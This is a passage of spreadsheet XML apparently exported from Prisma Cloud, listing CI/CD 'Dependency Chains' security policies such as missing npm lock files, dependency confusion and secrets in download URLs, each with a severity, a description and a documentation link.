      <c r="U200" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V200" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W200" t="inlineStr">
        <is>
          <t>The package-lock.json file includes information about the dependencies of a package, as well as the hashes of the downloaded packages and the source URLs. This information can be used to verify the integrity of the package installation. If a package-lock.json file is not used when running "npm ci" during the package build process, the packages will be installed without undergoing integrity checks provided by the package-lock.json file. This may lead to the package being tampered, which could potentially result in malicious code being executed in the pipeline or delivered to production.</t>
        </is>
      </c>
      <c r="X200" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-miss-npmlockfile</t>
        </is>
      </c>
      <c r="Y200" t="inlineStr"/>
      <c r="Z200" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA200" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB200" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC200" t="inlineStr"/>
      <c r="AD200" t="b">
        <v>1</v>
      </c>
      <c r="AE200" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF200" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>31a2f3fa-54e4-4276-a9ac-5db4548ddd1f</t>
        </is>
      </c>
      <c r="AI200" t="inlineStr"/>
      <c r="AJ200" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK200" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" t="inlineStr"/>
      <c r="B201" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C201" s="2" t="inlineStr"/>
      <c r="D201" t="inlineStr"/>
      <c r="E201" t="inlineStr"/>
      <c r="F201" t="inlineStr"/>
      <c r="G201" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J201" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K201" t="inlineStr">
        <is>
          <t>Potential dependency confusion in a Bitbucket repository due to package name or scope available in registry</t>
        </is>
      </c>
      <c r="L201" t="inlineStr"/>
      <c r="M201" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N201" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O201" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P201" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q201" t="inlineStr"/>
      <c r="R201" t="inlineStr"/>
      <c r="S201" t="inlineStr"/>
      <c r="T201" t="b">
        <v>0</v>
      </c>
      <c r="U201" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V201" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W201" t="inlineStr">
        <is>
          <t>Attackers can discover internal package names by scanning public repositories and artifacts. Then they can upload malicious packages with names identical to an organization's internal package names and scopes, hoping that improper package fetching configuration will cause internal clients to fetch the malicious package rather than the legitimate internal package with the same name. This is known as a Dependency Confusion attack.</t>
        </is>
      </c>
      <c r="X201" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-potential-dependency-confusion</t>
        </is>
      </c>
      <c r="Y201" t="inlineStr"/>
      <c r="Z201" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA201" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB201" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC201" t="inlineStr"/>
      <c r="AD201" t="b">
        <v>1</v>
      </c>
      <c r="AE201" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF201" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>fb329a8b-40be-4651-9184-ced59f1abc5d</t>
        </is>
      </c>
      <c r="AI201" t="inlineStr"/>
      <c r="AJ201" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK201" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" t="inlineStr"/>
      <c r="B202" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C202" s="2" t="inlineStr"/>
      <c r="D202" t="inlineStr"/>
      <c r="E202" t="inlineStr"/>
      <c r="F202" t="inlineStr"/>
      <c r="G202" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J202" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K202" t="inlineStr">
        <is>
          <t>GitLab repository missing NPM lock file</t>
        </is>
      </c>
      <c r="L202" t="inlineStr"/>
      <c r="M202" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N202" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O202" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P202" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q202" t="inlineStr"/>
      <c r="R202" t="inlineStr"/>
      <c r="S202" t="inlineStr"/>
      <c r="T202" t="b">
        <v>0</v>
      </c>
      <c r="U202" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V202" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W202" t="inlineStr">
        <is>
          <t>The package-lock.json file includes information about the dependencies of a package, as well as the hashes of the downloaded packages and the source URLs. This information can be used to verify the integrity of the package installation. If a package-lock.json file is not used when running “npm ci” during the package build process, the packages will be installed without undergoing integrity checks provided by the package-lock.json file. This may lead to the package being tampered, which could potentially result in malicious code being executed in the pipeline or delivered to production.</t>
        </is>
      </c>
      <c r="X202" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-repo-miss-npmlockfile</t>
        </is>
      </c>
      <c r="Y202" t="inlineStr"/>
      <c r="Z202" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA202" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB202" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC202" t="inlineStr"/>
      <c r="AD202" t="b">
        <v>1</v>
      </c>
      <c r="AE202" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF202" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>e47b4d62-ae9d-49cd-8b98-1be0a36a0ee0</t>
        </is>
      </c>
      <c r="AI202" t="inlineStr"/>
      <c r="AJ202" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK202" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" t="inlineStr"/>
      <c r="B203" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C203" s="2" t="inlineStr"/>
      <c r="D203" t="inlineStr"/>
      <c r="E203" t="inlineStr"/>
      <c r="F203" t="inlineStr"/>
      <c r="G203" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J203" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K203" t="inlineStr">
        <is>
          <t>Secrets found in NPM dependency download URL in BitBucket repository</t>
        </is>
      </c>
      <c r="L203" t="inlineStr"/>
      <c r="M203" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N203" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O203" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P203" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q203" t="inlineStr"/>
      <c r="R203" t="inlineStr"/>
      <c r="S203" t="inlineStr"/>
      <c r="T203" t="b">
        <v>0</v>
      </c>
      <c r="U203" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V203" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W203" t="inlineStr">
        <is>
          <t>Including secrets in a NPM dependency download URL, which is found in the package-lock.json file, can allow an attacker who has gained access to the repository to gain unauthorized access to the package or to resources that are protected by the secret. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious code which could reach the production environment.</t>
        </is>
      </c>
      <c r="X203" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-secrets-npm-downloadurl</t>
        </is>
      </c>
      <c r="Y203" t="inlineStr"/>
      <c r="Z203" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA203" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB203" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC203" t="inlineStr"/>
      <c r="AD203" t="b">
        <v>1</v>
      </c>
      <c r="AE203" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF203" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>c1cc4962-8269-4a09-a36f-eb3fb0c95ceb</t>
        </is>
      </c>
      <c r="AI203" t="inlineStr"/>
      <c r="AJ203" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK203" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" t="inlineStr"/>
      <c r="B204" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C204" s="2" t="inlineStr"/>
      <c r="D204" t="inlineStr"/>
      <c r="E204" t="inlineStr"/>
      <c r="F204" t="inlineStr"/>
      <c r="G204" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J204" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K204" t="inlineStr">
        <is>
          <t>Missing '.npmrc' file in GitLab repository</t>
        </is>
      </c>
      <c r="L204" t="inlineStr"/>
      <c r="M204" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N204" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O204" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P204" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q204" t="inlineStr"/>
      <c r="R204" t="inlineStr"/>
      <c r="S204" t="inlineStr"/>
      <c r="T204" t="b">
        <v>0</v>
      </c>
      <c r="U204" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V204" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W204" t="inlineStr">
        <is>
          <t>The .npmrc file is a configuration file used by npm, the Node Package Manager, to manage settings and options related to package installation and publishing. Failing to store the .npmrc file in the repository can make the project vulnerable during pipelines to both dependency confusion, by allowing an internal package to be fetched from the public registry, as well as insecure use of credentials.</t>
        </is>
      </c>
      <c r="X204" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-missing-npmrc-file</t>
        </is>
      </c>
      <c r="Y204" t="inlineStr"/>
      <c r="Z204" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA204" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB204" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC204" t="inlineStr"/>
      <c r="AD204" t="b">
        <v>1</v>
      </c>
      <c r="AE204" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF204" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>a7423f5f-8d04-4633-8f81-2788b5257ed7</t>
        </is>
      </c>
      <c r="AI204" t="inlineStr"/>
      <c r="AJ204" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK204" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" t="inlineStr"/>
      <c r="B205" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C205" s="2" t="inlineStr"/>
      <c r="D205" t="inlineStr"/>
      <c r="E205" t="inlineStr"/>
      <c r="F205" t="inlineStr"/>
      <c r="G205" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J205" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K205" t="inlineStr">
        <is>
          <t>NPM package lock file verifies integrity with weak hash algorithm (GitHub)</t>
        </is>
      </c>
      <c r="L205" t="inlineStr"/>
      <c r="M205" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N205" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O205" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P205" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q205" t="inlineStr"/>
      <c r="R205" t="inlineStr"/>
      <c r="S205" t="inlineStr"/>
      <c r="T205" t="b">
        <v>0</v>
      </c>
      <c r="U205" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V205" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W205" t="inlineStr">
        <is>
          <t>Old versions of package-lock.json files using SHA-1 to verify the integrity of downloaded dependencies are vulnerable to collision attacks in which two inputs can produce the same output, meaning that attackers can create a malicious package with the same hash of a legitimate package, bypassing the integrity validation. An attacker who has gained access to a maintainer account could trick a pipeline that uses \"npm ci\" to securely install a package and verify the dependencies integrity by replacing a legitimate package with a malicious version that has the same hash, thereby introducing malicious code which could potentially reach production. Note: Due to SHA-1 vulnerabilities, it was deprecated by NIST in 2011.</t>
        </is>
      </c>
      <c r="X205" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-npm-package-lockfile-weak-hash</t>
        </is>
      </c>
      <c r="Y205" t="inlineStr"/>
      <c r="Z205" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA205" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB205" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC205" t="inlineStr"/>
      <c r="AD205" t="b">
        <v>1</v>
      </c>
      <c r="AE205" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF205" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>4f7c1014-a074-4e66-aa47-07541e5bcc88</t>
        </is>
      </c>
      <c r="AI205" t="inlineStr"/>
      <c r="AJ205" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK205" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" t="inlineStr"/>
      <c r="B206" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C206" s="2" t="inlineStr"/>
      <c r="D206" t="inlineStr"/>
      <c r="E206" t="inlineStr"/>
      <c r="F206" t="inlineStr"/>
      <c r="G206" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J206" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K206" t="inlineStr">
        <is>
          <t>NPM package downloaded from git without commit hash reference in a GitHub repository</t>
        </is>
      </c>
      <c r="L206" t="inlineStr"/>
      <c r="M206" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N206" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O206" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P206" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q206" t="inlineStr"/>
      <c r="R206" t="inlineStr"/>
      <c r="S206" t="inlineStr"/>
      <c r="T206" t="b">
        <v>0</v>
      </c>
      <c r="U206" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V206" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W206" t="inlineStr">
        <is>
          <t>NPM packages can be installed using a URL of a git repository, which may contain a reference to a branch, tag or commit hash. Without using a commit hash reference, the integrity of the downloaded package cannot be guaranteed. This can result in developers or build servers downloading a different version of the package than intended, potentially containing malicious code. This could expose both the development and production environments to risks.</t>
        </is>
      </c>
      <c r="X206" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-repo-npm-download-no-commit-hash-ref</t>
        </is>
      </c>
      <c r="Y206" t="inlineStr"/>
      <c r="Z206" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA206" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB206" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC206" t="inlineStr"/>
      <c r="AD206" t="b">
        <v>1</v>
      </c>
      <c r="AE206" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF206" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>926daaa3-57ca-4786-9d07-4cf42ecd0671</t>
        </is>
      </c>
      <c r="AI206" t="inlineStr"/>
      <c r="AJ206" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK206" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" t="inlineStr"/>
      <c r="B207" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C207" s="2" t="inlineStr"/>
      <c r="D207" t="inlineStr"/>
      <c r="E207" t="inlineStr"/>
      <c r="F207" t="inlineStr"/>
      <c r="G207" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J207" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K207" t="inlineStr">
        <is>
          <t>Unencrypted channel used in Azure repository to download dependencies from NPM registry</t>
        </is>
      </c>
      <c r="L207" t="inlineStr"/>
      <c r="M207" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N207" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O207" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P207" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q207" t="inlineStr"/>
      <c r="R207" t="inlineStr"/>
      <c r="S207" t="inlineStr"/>
      <c r="T207" t="b">
        <v>0</v>
      </c>
      <c r="U207" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V207" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W207" t="inlineStr">
        <is>
          <t>Downloading packages using HTTP instead of HTTPS can make them vulnerable to man-in-the-middle attacks, which could potentially allow malicious code to be injected into the packages and executed on the CI or developer's endpoints. This could also expose internal packages to tampering. The dependency`s download URL can be found in the package-lock.json file.</t>
        </is>
      </c>
      <c r="X207" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-unencryptedchannel-download-dependencies</t>
        </is>
      </c>
      <c r="Y207" t="inlineStr"/>
      <c r="Z207" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA207" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB207" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC207" t="inlineStr"/>
      <c r="AD207" t="b">
        <v>1</v>
      </c>
      <c r="AE207" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF207" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>f20b9ccb-14db-4308-9c2b-f7a8f144868a</t>
        </is>
      </c>
      <c r="AI207" t="inlineStr"/>
      <c r="AJ207" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK207" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" t="inlineStr"/>
      <c r="B208" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C208" s="2" t="inlineStr"/>
      <c r="D208" t="inlineStr"/>
      <c r="E208" t="inlineStr"/>
      <c r="F208" t="inlineStr"/>
      <c r="G208" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J208" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K208" t="inlineStr">
        <is>
          <t>Secrets found in NPM dependency download URL in GitHub repository</t>
        </is>
      </c>
      <c r="L208" t="inlineStr"/>
      <c r="M208" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N208" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O208" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P208" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q208" t="inlineStr"/>
      <c r="R208" t="inlineStr"/>
      <c r="S208" t="inlineStr"/>
      <c r="T208" t="b">
        <v>0</v>
      </c>
      <c r="U208" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V208" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W208" t="inlineStr">
        <is>
          <t>Including secrets in a NPM dependency download URL, which is found in the package-lock.json file, can allow an attacker who has gained access to the repository to gain unauthorized access to the package or to resources that are protected by the secret. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious code which could reach the production environment.</t>
        </is>
      </c>
      <c r="X208" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-repo-secrets-npm-dep-url</t>
        </is>
      </c>
      <c r="Y208" t="inlineStr"/>
      <c r="Z208" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA208" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB208" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC208" t="inlineStr"/>
      <c r="AD208" t="b">
        <v>1</v>
      </c>
      <c r="AE208" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF208" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>d9caba56-6afa-406c-9512-cb45bd15ffc6</t>
        </is>
      </c>
      <c r="AI208" t="inlineStr"/>
      <c r="AJ208" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK208" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" t="inlineStr"/>
      <c r="B209" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C209" s="2" t="inlineStr"/>
      <c r="D209" t="inlineStr"/>
      <c r="E209" t="inlineStr"/>
      <c r="F209" t="inlineStr"/>
      <c r="G209" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J209" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K209" t="inlineStr">
        <is>
          <t>Deprecated package used in NPM project of a GitLab repository</t>
        </is>
      </c>
      <c r="L209" t="inlineStr"/>
      <c r="M209" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N209" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O209" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P209" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q209" t="inlineStr"/>
      <c r="R209" t="inlineStr"/>
      <c r="S209" t="inlineStr"/>
      <c r="T209" t="b">
        <v>0</v>
      </c>
      <c r="U209" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V209" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W209" t="inlineStr">
        <is>
          <t>Deprecated packages can pose security risks to the project such as code vulnerabilities that can be discovered overtime and malicious package takeover due to configuration that change over time like the maintainer's email domain expiring.</t>
        </is>
      </c>
      <c r="X209" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-deprecated-pckg-npm-project</t>
        </is>
      </c>
      <c r="Y209" t="inlineStr"/>
      <c r="Z209" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA209" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB209" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC209" t="inlineStr"/>
      <c r="AD209" t="b">
        <v>1</v>
      </c>
      <c r="AE209" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF209" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>03cf1fcf-4c5e-4775-b3d0-c463d5d09ad3</t>
        </is>
      </c>
      <c r="AI209" t="inlineStr"/>
      <c r="AJ209" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK209" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" t="inlineStr"/>
      <c r="B210" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C210" s="2" t="inlineStr"/>
      <c r="D210" t="inlineStr"/>
      <c r="E210" t="inlineStr"/>
      <c r="F210" t="inlineStr"/>
      <c r="G210" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J210" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
